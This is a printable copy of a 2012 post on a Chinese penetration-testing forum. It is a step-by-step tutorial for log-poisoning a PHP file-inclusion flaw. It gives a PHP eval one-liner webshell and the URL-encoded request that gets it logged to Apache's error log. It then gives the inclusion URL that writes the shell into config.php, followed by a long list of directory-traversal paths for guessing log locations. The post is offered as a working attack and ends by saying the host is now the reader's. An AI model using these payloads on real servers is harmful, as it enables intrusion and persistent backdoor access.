中国网络渗透测试联盟

标题: php包含apache日志写马 [打印本页]
作者: admin    时间: 2012-9-15 14:27
标题: php包含apache日志写马
因为上面那个很不实际,我在测试中发现日志动不动就是几十兆,那样玩起来也没意思了。下面想的再深入一点也就是我们写入一个很实际的webshell来用,也比上面那种慢的要死好很多。 : q: f3 z$ H8 @$ }

. L2 }. S" _  X1 n- H比如还是这句一句话木马 ' Q5 W$ E  @: `" r; Y& A& E
<?eval($_POST[cmd]);?>   # j3 X4 ?1 ~1 @1 z4 B5 i

( g9 w1 j$ j* M6 Z9 r# k到这里你也许就想到了,这是个很不错的办法。接着看,如何写入就成了个问题,用这句, 4 M  P" C$ J3 a! d4 D6 g
fopen打开/home/virtual/www.xxx.com/forum/config.php这个文件,然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是 1 [& k+ l+ i+ S2 B; m, L
; c& O$ ~7 S, H1 P1 n$ |
<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>"); " C$ E5 d4 c5 v3 |( {! `
fclose($fp);?>   //在config.php里写入一句木马语句 7 {6 ?% ~# w+ n! k( W% [' @

0 F5 c1 _9 s& O我们提交这句,再让Apache记录到错误日志里,再包含就成功写入shell,记得一定要转换成URL格式才成功。 . e; K! |" D  D8 m# a
转换为
( l$ R5 ^- c7 N' X%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F # Y/ ]0 }* V, n8 I! M( u! a1 ?
config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp / _5 U+ A' p: t" H
%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
9 D2 G9 i7 Z1 P, e7 a; `fclose%28%24fp%29%3B%3F%3E   x7 G5 a1 a1 `
我们提交
! n) q# ]5 ]; [' N" G3 v) @# G  N, @http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww
5 O* d  G  a* a3 E( T9 ?%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp 0 p* T. |1 B1 O# B  B) y8 q
%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B
. F$ r) R2 r0 O& n) [. r5 Lcmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E 1 h, `% G. O- X( @7 z2 X, I& w
( [/ d; H  i! F  ]8 m6 ^. `; `
这样就错误日志里就记录下了这行写入webshell的代码。 / h- `3 H8 T1 h5 Y2 A; Q; @
我们再来包含日志,提交 5 j: n% i. p$ O1 Y! f1 r
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log # S. g6 K+ `6 V5 n7 I+ A
. o, \6 \* F( ]8 `% ^$ h: ~% I
这样webshell就写入成功了,config.php里就写入一句木马语句 * h+ R+ i5 }( T* s2 w
OK.
2 p- y& Z+ I, B: Vhttp://www.xxx.com/forum/config.php这个就成了我们的webshell " L) s3 k+ d/ h, _
直接用lanker的客户端一连,主机就是你的了。 4 H9 k0 u( T6 e/ S2 X& x/ g" y
: w) [9 q7 W" S$ X
PS:上面讲的,前提是文件夹权限必须可写 ,一定要-rwxrwxrwx(777)才能继续,这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用 ( |1 X, E0 U' v" K* t, }+ T+ |

- Q* n# S: @: X其他的日志路径,你可以去猜,也可以参照这里。 " n" o* P! }9 ]( B1 D
../../../../../../../../../../var/log/httpd/access_log ( k0 n  l! I) \1 n' @) A- L
../../../../../../../../../../var/log/httpd/error_log
- @5 m; P* T( n! j5 |/ I% n../apache/logs/error.log
2 t* G/ i2 |( ?: Y, C../apache/logs/access.log
) ?. B% E- G0 ~! ^# z../../apache/logs/error.log ; f9 J9 l! ]9 Q$ i0 e' X) a  C
../../apache/logs/access.log 2 y, k3 g0 D' C0 K9 j1 J! ]+ a1 s
../../../apache/logs/error.log
. C$ `1 i5 h: ^6 G6 B; T, ]../../../apache/logs/access.log $ k. c& z) a. C1 b" c& o, i
../../../../../../../../../../etc/httpd/logs/acces_log * }; ?+ q; T: U$ C+ ~
../../../../../../../../../../etc/httpd/logs/acces.log
9 h1 M* {( C. n9 i/ k  P../../../../../../../../../../etc/httpd/logs/error_log
( G& \' i( ?# F: Q6 t/ f7 V# U, J../../../../../../../../../../etc/httpd/logs/error.log   D& A" U8 ^" U4 d0 [# E
../../../../../../../../../../var/www/logs/access_log
0 `4 J; h- {8 s( k  B! ~../../../../../../../../../../var/www/logs/access.log - c& x/ J) m) B  ?/ `& |: A; o1 q
../../../../../../../../../../usr/local/apache/logs/access_log 8 z+ C8 U' ^* m
../../../../../../../../../../usr/local/apache/logs/access.log 7 R& T) s/ v! }4 t2 F
../../../../../../../../../../var/log/apache/access_log
8 s: }0 C$ M3 Z../../../../../../../../../../var/log/apache/access.log
+ z6 ?2 m" k1 }, J) @$ Q../../../../../../../../../../var/log/access_log : W" [# W$ {1 r* @, q* w
../../../../../../../../../../var/www/logs/error_log % E$ q4 f9 ^8 v- X! t, ~
../../../../../../../../../../var/www/logs/error.log
8 H% r' F* S" [" F% c  m../../../../../../../../../../usr/local/apache/logs/error_log
0 c9 x1 [2 h7 S* i1 g3 b3 q../../../../../../../../../../usr/local/apache/logs/error.log & H' P' p4 K6 c' i& k7 K
../../../../../../../../../../var/log/apache/error_log
5 o9 X4 x: |0 I. E../../../../../../../../../../var/log/apache/error.log
0 @; _; T7 Y8 i) M7 z1 L7 Y../../../../../../../../../../var/log/access_log * ?, X3 o" a- e
../../../../../../../../../../var/log/error_log 4 N$ b# x  U3 y. f& R
/var/log/httpd/access_log       $ D" O3 u0 s; @& Q. V$ u+ P4 J
/var/log/httpd/error_log     
" q7 b/ l; q- X' P../apache/logs/error.log     
: x7 u! X$ W; a7 @  F../apache/logs/access.log / R1 p4 Y" h/ c, h2 h/ ]7 u
../../apache/logs/error.log 0 G1 Q& b, U2 M; q0 z& H" {4 n1 S$ G# M
../../apache/logs/access.log
+ }" c0 W5 V8 g; j../../../apache/logs/error.log / B- ~% k8 C  a* M( J  [5 g6 d7 r
../../../apache/logs/access.log
9 Y$ s9 v6 G: z+ o/etc/httpd/logs/acces_log
2 s, |" f' }2 d; I- f2 q/etc/httpd/logs/acces.log 0 S) o( \7 o8 S: X. X7 ~1 y
/etc/httpd/logs/error_log
2 ^& I( H7 X) t3 h; y9 X0 S% B/etc/httpd/logs/error.log
2 r6 c' l8 }( f5 y9 u/var/www/logs/access_log
% h8 A/ a; ]8 `' @, }* M! H  ~/var/www/logs/access.log ' m  b  i' A, _- p9 C( a
/usr/local/apache/logs/access_log % r  E/ t; C- X! d  q5 R" T, H
/usr/local/apache/logs/access.log 0 t7 x' b9 S* r2 @
/var/log/apache/access_log : m8 i0 m" o9 \& b' k
/var/log/apache/access.log 0 K! ]9 C4 |. Y* d" `$ K' b7 k
/var/log/access_log
  n2 F* [  Q; z# F3 O/var/www/logs/error_log ! w- ?0 r0 Q! |; d  B4 G! B# o
/var/www/logs/error.log 2 g, F8 K$ Z. z) ?7 H
/usr/local/apache/logs/error_log
1 t) c2 H; z  i8 N8 B/usr/local/apache/logs/error.log 1 U8 Y8 Z" B: Q4 \& B* a
/var/log/apache/error_log 1 N- J7 X7 G5 t9 I
/var/log/apache/error.log
4 `; n9 h/ b* K  c/ F/var/log/access_log 8 s; a6 M: n( G
/var/log/error_log



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2